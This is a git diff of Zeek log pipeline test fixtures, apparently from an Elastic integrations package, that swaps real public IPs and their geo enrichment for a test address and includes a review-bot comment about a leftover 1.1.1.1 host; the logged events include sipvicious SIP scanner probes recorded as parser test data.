@@ -278,26 +280,26 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "MX-CMX", - "city_name": "Mexico City", - "country_iso_code": "MX", - "country_name": "Mexico", - "region_name": "Mexico City", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -99.1438, - "lat": 19.4357 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 18734, + "number": 29518, "organization": { - "name": "Operbes, S.A. de C.V." + "name": "Bredband2 AB" } }, - "address": "200.57.7.205", + "address": "89.160.20.156", "port": 5061, - "ip": "200.57.7.205" + "ip": "89.160.20.156" }, "url": { "full": "sip:Verso.com" @@ -307,7 +309,7 @@ ], "network": { "protocol": "sip", - "community_id": "1:0hvHF/bh5wFKg7nfRXxsno4F198=", + "community_id": "1:epsmqZ4+HVOOBLHj+vSEzlRIwbM=", "transport": "udp" }, "@timestamp": "2005-01-14T17:58:07.022Z", 
@@ -316,13 +318,12 @@ }, "related": { "ip": [ - "200.57.7.205", - "200.57.7.195" + "89.160.20.156" ] }, "event": { - "ingested": "2021-08-11T19:18:35.589909800Z", - "original": "{\"ts\":1105725487.022577,\"uid\":\"CJZDWgixtwqXctWEg\",\"id.orig_h\":\"200.57.7.205\",\"id.orig_p\":5061,\"id.resp_h\":\"200.57.7.195\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:Verso.com\",\"request_from\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"request_to\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"response_from\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"response_to\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"call_id\":\"46E1C3CB36304F84A020CF6DD3F96461@Verso.com\",\"seq\":\"37764 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 200.57.7.205:5061;rport\"],\"response_path\":[\"SIP/2.0/UDP 200.57.7.205:5061;received=200.57.7.205;rport=5061\"],\"user_agent\":\"Verso Softphone release 1104w\",\"status_code\":200,\"status_msg\":\"OK\",\"request_body_len\":0,\"response_body_len\":0}", + "ingested": "2021-12-09T13:51:09.041832Z", + "original": "{\"ts\":1105725487.022577,\"uid\":\"CJZDWgixtwqXctWEg\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5061,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:Verso.com\",\"request_from\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"request_to\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"response_from\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"response_to\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"call_id\":\"46E1C3CB36304F84A020CF6DD3F96461@Verso.com\",\"seq\":\"37764 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;rport\"],\"response_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;received=89.160.20.156;rport=5061\"],\"user_agent\":\"Verso Softphone release 1104w\",\"status_code\":200,\"status_msg\":\"OK\",\"request_body_len\":0,\"response_body_len\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": 
"event", "action": "REGISTER", @@ -348,7 +349,7 @@ "sip": { "request": { "path": [ - "SIP/2.0/UDP 193.107.216.13:5083" + "SIP/2.0/UDP 89.160.20.156:5083" ], "from": "\"sipvicious\"\u003csip:90501@1.1.1.1\u003e", "to": "\"sipvicious\"\u003csip:90501@1.1.1.1\u003e", @@ -361,7 +362,7 @@ "response": { "path": [] }, - "uri": "sip:100@35.198.74.222", + "uri": "sip:100@89.160.20.156", "transaction_depth": 0, "user_agent": "friendly-scanner", "call_id": "767538559354206383610151" @@ -370,32 +371,35 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Poland", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 21.0362, - "lat": 52.2394 - }, - "country_iso_code": "PL" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 24000, + "number": 29518, "organization": { - "name": "24.hk global BGP" + "name": "Bredband2 AB" } }, - "address": "193.107.216.13", + "address": "89.160.20.156", "port": 5083, - "ip": "193.107.216.13" + "ip": "89.160.20.156" }, "url": { - "full": "sip:100@35.198.74.222" + "full": "sip:100@89.160.20.156" }, "tags": [ "preserve_original_event" ], "network": { "protocol": "sip", - "community_id": "1:0yHuzsMc9NWnZAgB15XTv5hKFPI=", + "community_id": "1:eAmnybkUlcgqIMU6KMfWi3X/b84=", "transport": "udp" }, "@timestamp": "2021-03-30T15:50:16.928Z", 
@@ -404,13 +408,13 @@ }, "related": { "ip": [ - "193.107.216.13", + "89.160.20.156", "10.156.0.2" ] }, "event": { - "ingested": "2021-08-11T19:18:35.589918Z", - "original": "{\"ts\":1617119416.928735,\"uid\":\"CR6XQH1Lf2mF9YG7H2\",\"id.orig_h\":\"193.107.216.13\",\"id.orig_p\":5083,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"OPTIONS\",\"uri\":\"sip:100@35.198.74.222\",\"request_from\":\"\\\"sipvicious\\\"\u003csip:90501@1.1.1.1\u003e\",\"request_to\":\"\\\"sipvicious\\\"\u003csip:90501@1.1.1.1\u003e\",\"call_id\":\"767538559354206383610151\",\"seq\":\"1 OPTIONS\",\"request_path\":[\"SIP/2.0/UDP 193.107.216.13:5083\"],\"response_path\":[],\"user_agent\":\"friendly-scanner\",\"request_body_len\":0}", + "ingested": "2021-12-09T13:51:09.041835200Z", + "original": "{\"ts\":1617119416.928735,\"uid\":\"CR6XQH1Lf2mF9YG7H2\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5083,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"OPTIONS\",\"uri\":\"sip:100@89.160.20.156\",\"request_from\":\"\\\"sipvicious\\\"\u003csip:90501@1.1.1.1\u003e\",\"request_to\":\"\\\"sipvicious\\\"\u003csip:90501@1.1.1.1\u003e\",\"call_id\":\"767538559354206383610151\",\"seq\":\"1 OPTIONS\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156:5083\"],\"response_path\":[],\"user_agent\":\"friendly-scanner\",\"request_body_len\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "OPTIONS", @@ -448,7 +452,7 @@ "response": { "path": [] }, - "uri": "sip:100@35.198.74.222", + "uri": "sip:100@89.160.20.156", "transaction_depth": 0, "user_agent": "friendly-scanner", "call_id": "35848812076538877174452" 
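Review bot: The sipvicious OPTIONS fixture still carries `1.1.1.1` in `request_from` and `request_to` (`\"sipvicious\"<sip:90501@1.1.1.1>`) even though `uri` and `id.orig_h` in the same `original` line were moved to the supported test address. Those SIP URI hosts are not geo-enriched, so enrichment fields are unaffected, but this leaves a real third-party public address in the fixture, which appears to be exactly what this change set is trying to remove. If the intent is to purge non-test public IPs, replace the host part in the From/To URIs as well, e.g. `\"sipvicious\"<sip:90501@89.160.20.156>`, in the input log these expected files are generated from (outside this hunk), and regenerate.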
@@ -457,32 +461,35 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Germany", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 9.491, - "lat": 51.2993 - }, - "country_iso_code": "DE" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 40676, + "number": 29518, "organization": { - "name": "Psychz Networks" + "name": "Bredband2 AB" } }, - "address": "45.134.144.100", + "address": "89.160.20.156", "port": 5170, - "ip": "45.134.144.100" + "ip": "89.160.20.156" }, "url": { - "full": "sip:100@35.198.74.222" + "full": "sip:100@89.160.20.156" }, "tags": [ "preserve_original_event" ], "network": { "protocol": "sip", - "community_id": "1:CG92d5aAL3DgFhEJiDndd41USVA=", + "community_id": "1:0TzRwUHcSPsujDehf6eBy7VLTBA=", "transport": "udp" }, "@timestamp": "2021-03-30T15:58:43.416Z", 
@@ -491,13 +498,13 @@ }, "related": { "ip": [ - "45.134.144.100", + "89.160.20.156", "10.156.0.2" ] }, "event": { - "ingested": "2021-08-11T19:18:35.589926200Z", - "original": "{\"ts\":1617119923.416653,\"uid\":\"Cf9QMt4ear7ZkX74ti\",\"id.orig_h\":\"45.134.144.100\",\"id.orig_p\":5170,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"OPTIONS\",\"uri\":\"sip:100@35.198.74.222\",\"request_from\":\"\\\"sipvicious\\\"\u003csip:100@1.1.1.1\u003e\",\"request_to\":\"\\\"sipvicious\\\"\u003csip:100@1.1.1.1\u003e\",\"call_id\":\"35848812076538877174452\",\"seq\":\"1 OPTIONS\",\"request_path\":[\"SIP/2.0/UDP 127.0.0.1:5170\"],\"response_path\":[],\"user_agent\":\"friendly-scanner\",\"request_body_len\":0}", + "ingested": "2021-12-09T13:51:09.041839500Z", + "original": "{\"ts\":1617119923.416653,\"uid\":\"Cf9QMt4ear7ZkX74ti\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5170,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"OPTIONS\",\"uri\":\"sip:100@89.160.20.156\",\"request_from\":\"\\\"sipvicious\\\"\u003csip:100@1.1.1.1\u003e\",\"request_to\":\"\\\"sipvicious\\\"\u003csip:100@1.1.1.1\u003e\",\"call_id\":\"35848812076538877174452\",\"seq\":\"1 OPTIONS\",\"request_path\":[\"SIP/2.0/UDP 127.0.0.1:5170\"],\"response_path\":[],\"user_agent\":\"friendly-scanner\",\"request_body_len\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "OPTIONS", 
@@ -519,33 +526,33 @@ }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "MX-CMX", - "city_name": "Mexico City", - "country_iso_code": "MX", - "country_name": "Mexico", - "region_name": "Mexico City", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -99.1438, - "lat": 19.4357 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 18734, + "number": 29518, "organization": { - "name": "Operbes, S.A. de C.V." + "name": "Bredband2 AB" } }, - "address": "200.57.7.195", + "address": "89.160.20.156", "port": 5060, - "ip": "200.57.7.195" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CJZDWgixtwqXctWEg", "sip": { "request": { "path": [ - "SIP/2.0/UDP 200.57.7.205:5061;rport" + "SIP/2.0/UDP 89.160.20.156:5061;rport" ], "from": "Ivan \u003csip:Ivan@Verso.com\u003e", "to": "Ivan \u003csip:Ivan@Verso.com\u003e", @@ -557,7 +564,7 @@ }, "response": { "path": [ - "SIP/2.0/UDP 200.57.7.205:5061;received=200.57.7.205;rport=5061" + "SIP/2.0/UDP 89.160.20.156:5061;received=89.160.20.156;rport=5061" ], "from": "\"Ivan\" \u003csip:Ivan@Verso.com\u003e", "to": "\"Ivan\" \u003csip:Ivan@Verso.com\u003e", 
@@ -575,26 +582,26 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "MX-CMX", - "city_name": "Mexico City", - "country_iso_code": "MX", - "country_name": "Mexico", - "region_name": "Mexico City", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -99.1438, - "lat": 19.4357 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 18734, + "number": 29518, "organization": { - "name": "Operbes, S.A. de C.V." + "name": "Bredband2 AB" } }, - "address": "200.57.7.205", + "address": "89.160.20.156", "port": 5061, - "ip": "200.57.7.205" + "ip": "89.160.20.156" }, "url": { "full": "sip:Verso.com" @@ -604,7 +611,7 @@ ], "network": { "protocol": "sip", - "community_id": "1:0hvHF/bh5wFKg7nfRXxsno4F198=", + "community_id": "1:epsmqZ4+HVOOBLHj+vSEzlRIwbM=", "transport": "udp" }, "@timestamp": "2005-01-14T17:58:07.022Z", 
@@ -613,16 +620,15 @@ }, "related": { "ip": [ - "200.57.7.205", - "200.57.7.195" + "89.160.20.156" ] }, "host": { "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:35.589934400Z", - "original": "{\"ts\":1105725487.022577,\"uid\":\"CJZDWgixtwqXctWEg\",\"id.orig_h\":\"200.57.7.205\",\"id.orig_p\":5061,\"id.resp_h\":\"200.57.7.195\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:Verso.com\",\"request_from\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"request_to\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"response_from\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"response_to\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"call_id\":\"46E1C3CB36304F84A020CF6DD3F96461@Verso.com\",\"seq\":\"37764 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 200.57.7.205:5061;rport\"],\"response_path\":[\"SIP/2.0/UDP 200.57.7.205:5061;received=200.57.7.205;rport=5061\"],\"user_agent\":\"Verso Softphone release 1104w\",\"status_code\":200,\"status_msg\":\"OK\",\"request_body_len\":0,\"response_body_len\":0}", + "ingested": "2021-12-09T13:51:09.041844400Z", + "original": "{\"ts\":1105725487.022577,\"uid\":\"CJZDWgixtwqXctWEg\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5061,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:Verso.com\",\"request_from\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"request_to\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"response_from\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"response_to\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"call_id\":\"46E1C3CB36304F84A020CF6DD3F96461@Verso.com\",\"seq\":\"37764 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;rport\"],\"response_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;received=89.160.20.156;rport=5061\"],\"user_agent\":\"Verso Softphone release 1104w\",\"status_code\":200,\"status_msg\":\"OK\",\"request_body_len\":0,\"response_body_len\":0}", 
"created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "REGISTER", diff --git a/packages/zeek/data_stream/smb_cmd/_dev/test/pipeline/test-smb-cmd.log-expected.json b/packages/zeek/data_stream/smb_cmd/_dev/test/pipeline/test-smb-cmd.log-expected.json index 8f91345e97a..e9c2a3f4562 100644 --- a/packages/zeek/data_stream/smb_cmd/_dev/test/pipeline/test-smb-cmd.log-expected.json +++ b/packages/zeek/data_stream/smb_cmd/_dev/test/pipeline/test-smb-cmd.log-expected.json @@ -43,7 +43,7 @@ "ip": "172.16.133.6" }, "event": { - "ingested": "2021-08-11T19:18:36.646586300Z", + "ingested": "2021-12-09T13:51:10.088827400Z", "original": "{\"ts\":1361916332.020006,\"uid\":\"CbT8mpAXseu6Pt4R7\",\"id.orig_h\":\"172.16.133.6\",\"id.orig_p\":1728,\"id.resp_h\":\"172.16.128.202\",\"id.resp_p\":445,\"command\":\"NT_CREATE_ANDX\",\"argument\":\"\\u005cbrowser\",\"status\":\"SUCCESS\",\"rtt\":0.091141,\"version\":\"SMB1\",\"tree\":\"\\u005c\\u005cJSRVR20\\u005cIPC$\",\"tree_service\":\"IPC\",\"referenced_file.ts\":1361916332.020006,\"referenced_file.uid\":\"CbT8mpAXseu6Pt4R7\",\"referenced_file.id.orig_h\":\"172.16.133.6\",\"referenced_file.id.orig_p\":1728,\"referenced_file.id.resp_h\":\"172.16.128.202\",\"referenced_file.id.resp_p\":445,\"referenced_file.action\":\"SMB::FILE_OPEN\",\"referenced_file.name\":\"\\u005cbrowser\",\"referenced_file.size\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -126,7 +126,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:36.646597600Z", + "ingested": "2021-12-09T13:51:10.088835100Z", "original": "{\"ts\":1361916332.020006,\"uid\":\"CbT8mpAXseu6Pt4R7\",\"id.orig_h\":\"172.16.133.6\",\"id.orig_p\":1728,\"id.resp_h\":\"172.16.128.202\",\"id.resp_p\":445,\"command\":\"NT_CREATE_ANDX\",\"argument\":\"\\u005cbrowser\",\"status\":\"SUCCESS\",\"rtt\":0.091141,\"version\":\"SMB1\",\"tree\":\"\\u005c\\u005cJSRVR20\\u005cIPC$\",\"tree_service\":\"IPC\",\"referenced_file.ts\":1361916332.020006,\"referenced_file.uid\":\"CbT8mpAXseu6Pt4R7\",\"referenced_file.id.orig_h\":\"172.16.133.6\",\"referenced_file.id.orig_p\":1728,\"referenced_file.id.resp_h\":\"172.16.128.202\",\"referenced_file.id.resp_p\":445,\"referenced_file.action\":\"SMB::FILE_OPEN\",\"referenced_file.name\":\"\\u005cbrowser\",\"referenced_file.size\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/smb_files/_dev/test/pipeline/test-smb-files.log-expected.json b/packages/zeek/data_stream/smb_files/_dev/test/pipeline/test-smb-files.log-expected.json index bc81e2ee2a9..4c2a129efbb 100644 --- a/packages/zeek/data_stream/smb_files/_dev/test/pipeline/test-smb-files.log-expected.json +++ b/packages/zeek/data_stream/smb_files/_dev/test/pipeline/test-smb-files.log-expected.json @@ -54,7 +54,7 @@ ] }, "event": { - "ingested": "2021-08-11T19:18:37.102680900Z", + "ingested": "2021-12-09T13:51:10.459184600Z", "original": "{\"ts\":1507565599.576942,\"uid\":\"C9YAaEzWLL62yWMn5\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49239,\"id.resp_h\":\"192.168.10.30\",\"id.resp_p\":445,\"action\":\"SMB::FILE_OPEN\",\"path\":\"\\u005c\\u005cadmin-pc\\u005cADMIN$\",\"name\":\"PSEXESVC.exe\",\"size\":0,\"times.modified\":1507565599.607777,\"times.accessed\":1507565599.607777,\"times.created\":1507565599.607777,\"times.changed\":1507565599.607777}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -133,7 +133,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:37.102727600Z", + "ingested": "2021-12-09T13:51:10.459194Z", "original": "{\"ts\":1507565599.576942,\"uid\":\"C9YAaEzWLL62yWMn5\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49239,\"id.resp_h\":\"192.168.10.30\",\"id.resp_p\":445,\"action\":\"SMB::FILE_OPEN\",\"path\":\"\\u005c\\u005cadmin-pc\\u005cADMIN$\",\"name\":\"PSEXESVC.exe\",\"size\":0,\"times.modified\":1507565599.607777,\"times.accessed\":1507565599.607777,\"times.created\":1507565599.607777,\"times.changed\":1507565599.607777}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/smb_mapping/_dev/test/pipeline/test-smb-mapping.log-expected.json b/packages/zeek/data_stream/smb_mapping/_dev/test/pipeline/test-smb-mapping.log-expected.json index d9caeedaf6e..a99565de49c 100644 --- a/packages/zeek/data_stream/smb_mapping/_dev/test/pipeline/test-smb-mapping.log-expected.json +++ b/packages/zeek/data_stream/smb_mapping/_dev/test/pipeline/test-smb-mapping.log-expected.json @@ -29,7 +29,7 @@ "ip": "192.168.10.31" }, "event": { - "ingested": "2021-08-11T19:18:37.556241300Z", + "ingested": "2021-12-09T13:51:10.847414400Z", "original": "{\"ts\":1507565599.576613,\"uid\":\"C9YAaEzWLL62yWMn5\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49239,\"id.resp_h\":\"192.168.10.30\",\"id.resp_p\":445,\"path\":\"\\u005c\\u005cadmin-pc\\u005cADMIN$\",\"share_type\":\"DISK\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -96,7 +96,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:37.556249600Z", + "ingested": "2021-12-09T13:51:10.847422700Z", "original": "{\"ts\":1507565599.576613,\"uid\":\"C9YAaEzWLL62yWMn5\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49239,\"id.resp_h\":\"192.168.10.30\",\"id.resp_p\":445,\"path\":\"\\u005c\\u005cadmin-pc\\u005cADMIN$\",\"share_type\":\"DISK\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
diff --git a/packages/zeek/data_stream/smtp/_dev/test/pipeline/test-smtp.log-expected.json b/packages/zeek/data_stream/smtp/_dev/test/pipeline/test-smtp.log-expected.json index 8795dd4c7ab..51a2cf90be5 100644 --- a/packages/zeek/data_stream/smtp/_dev/test/pipeline/test-smtp.log-expected.json +++ b/packages/zeek/data_stream/smtp/_dev/test/pipeline/test-smtp.log-expected.json @@ -47,7 +47,7 @@ "established": true }, "event": { - "ingested": "2021-08-11T19:18:37.984614700Z", + "ingested": "2021-12-09T13:51:11.179554200Z", "original": "{\"ts\":1543877987.381899,\"uid\":\"CWWzPB3RjqhFf528c\",\"id.orig_h\":\"192.168.1.10\",\"id.orig_p\":33782,\"id.resp_h\":\"192.168.1.9\",\"id.resp_p\":25,\"trans_depth\":1,\"helo\":\"EXAMPLE.COM\",\"last_reply\":\"220 2.0.0 SMTP server ready\",\"path\":[\"192.168.1.9\"],\"tls\":true,\"fuids\":[],\"is_webmail\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -116,7 +116,7 @@ "established": true }, "event": { - "ingested": "2021-08-11T19:18:37.984628900Z", + "ingested": "2021-12-09T13:51:11.179563400Z", "original": "{\"ts\":1543877987.381899,\"uid\":\"CWWzPB3RjqhFf528c\",\"id.orig_h\":\"192.168.1.10\",\"id.orig_p\":33782,\"id.resp_h\":\"192.168.1.9\",\"id.resp_p\":25,\"trans_depth\":1,\"helo\":\"EXAMPLE.COM\",\"last_reply\":\"220 2.0.0 SMTP server ready\",\"path\":[\"192.168.1.9\"],\"tls\":true,\"fuids\":[],\"is_webmail\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log b/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log index 4ef105f119f..9e18e4a9e04 100644 --- a/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log +++ b/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log 
@@ -1,3 +1,3 @@ {"ts":1543877948.916584,"uid":"CnKW1B4w9fpRa6Nkf2","id.orig_h":"192.168.1.2","id.orig_p":59696,"id.resp_h":"192.168.1.1","id.resp_p":161,"duration":7.849924,"version":"2c","community":"public","get_requests":0,"get_bulk_requests":0,"get_responses":8,"set_requests":0,"up_since":1543631204.766508} -{"ts":1617080496.400704,"uid":"CxtWIB4ECPW89F8mSi","id.orig_h":"184.105.139.67","id.orig_p":37533,"id.resp_h":"10.156.0.2","id.resp_p":161,"duration":0.0,"version":"2c","community":"public","get_requests":4,"get_bulk_requests":0,"get_responses":0,"set_requests":0} +{"ts":1617080496.400704,"uid":"CxtWIB4ECPW89F8mSi","id.orig_h":"89.160.20.156","id.orig_p":37533,"id.resp_h":"10.156.0.2","id.resp_p":161,"duration":0.0,"version":"2c","community":"public","get_requests":4,"get_bulk_requests":0,"get_responses":0,"set_requests":0} {"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1543877948.916584,\"uid\":\"CnKW1B4w9fpRa6Nkf2\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":59696,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":161,\"duration\":7.849924,\"version\":\"2c\",\"community\":\"public\",\"get_requests\":0,\"get_bulk_requests\":0,\"get_responses\":8,\"set_requests\":0,\"up_since\":1543631204.766508}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/snmp.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log-expected.json b/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log-expected.json index 6fb5289ecd8..a01d7381121 100644 --- a/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log-expected.json 
+++ b/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log-expected.json @@ -39,7 +39,7 @@ "ip": "192.168.1.2" }, "event": { - "ingested": "2021-08-11T19:18:38.426521200Z", + "ingested": "2021-12-09T13:51:11.552302400Z", "original": "{\"ts\":1543877948.916584,\"uid\":\"CnKW1B4w9fpRa6Nkf2\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":59696,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":161,\"duration\":7.849924,\"version\":\"2c\",\"community\":\"public\",\"get_requests\":0,\"get_bulk_requests\":0,\"get_responses\":8,\"set_requests\":0,\"up_since\":1543631204.766508}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -68,7 +68,7 @@ }, "related": { "ip": [ - "184.105.139.67", + "89.160.20.156", "10.156.0.2" ] }, 
@@ -95,27 +95,30 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 6939, + "number": 29518, "organization": { - "name": "Hurricane Electric LLC" + "name": "Bredband2 AB" } }, - "address": "184.105.139.67", + "address": "89.160.20.156", "port": 37533, - "ip": "184.105.139.67" + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-08-11T19:18:38.426533800Z", - "original": "{\"ts\":1617080496.400704,\"uid\":\"CxtWIB4ECPW89F8mSi\",\"id.orig_h\":\"184.105.139.67\",\"id.orig_p\":37533,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":161,\"duration\":0.0,\"version\":\"2c\",\"community\":\"public\",\"get_requests\":4,\"get_bulk_requests\":0,\"get_responses\":0,\"set_requests\":0}", + "ingested": "2021-12-09T13:51:11.552374200Z", + "original": "{\"ts\":1617080496.400704,\"uid\":\"CxtWIB4ECPW89F8mSi\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":37533,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":161,\"duration\":0.0,\"version\":\"2c\",\"community\":\"public\",\"get_requests\":4,\"get_bulk_requests\":0,\"get_responses\":0,\"set_requests\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CxtWIB4ECPW89F8mSi", @@ -132,7 +135,7 @@ ], "network": { "protocol": "snmp", - "community_id": "1:MUkMU0Syk5ccgUPSHnt5CrInr9E=", + "community_id": "1:CME095Bogwz14GC0LzmiGaWz0bA=", "transport": "udp" } }, 
@@ -191,7 +194,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:38.426541100Z", + "ingested": "2021-12-09T13:51:11.552380Z", "original": "{\"ts\":1543877948.916584,\"uid\":\"CnKW1B4w9fpRa6Nkf2\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":59696,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":161,\"duration\":7.849924,\"version\":\"2c\",\"community\":\"public\",\"get_requests\":0,\"get_bulk_requests\":0,\"get_responses\":8,\"set_requests\":0,\"up_since\":1543631204.766508}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/socks/_dev/test/pipeline/test-socks.log-expected.json b/packages/zeek/data_stream/socks/_dev/test/pipeline/test-socks.log-expected.json index ea1ad61ff57..0a141e5257a 100644 --- a/packages/zeek/data_stream/socks/_dev/test/pipeline/test-socks.log-expected.json +++ b/packages/zeek/data_stream/socks/_dev/test/pipeline/test-socks.log-expected.json @@ -36,7 +36,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-08-11T19:18:38.923275100Z", + "ingested": "2021-12-09T13:51:12.003932500Z", "original": "{\"ts\":1566508093.09494,\"uid\":\"Cmz4Cb4qCw1hGqYw1c\",\"id.orig_h\":\"127.0.0.1\",\"id.orig_p\":35368,\"id.resp_h\":\"127.0.0.1\",\"id.resp_p\":8080,\"version\":5,\"status\":\"succeeded\",\"request.name\":\"www.google.com\",\"request_p\":443,\"bound.host\":\"0.0.0.0\",\"bound_p\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -111,7 +111,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:38.923288900Z", + "ingested": "2021-12-09T13:51:12.003940700Z", "original": 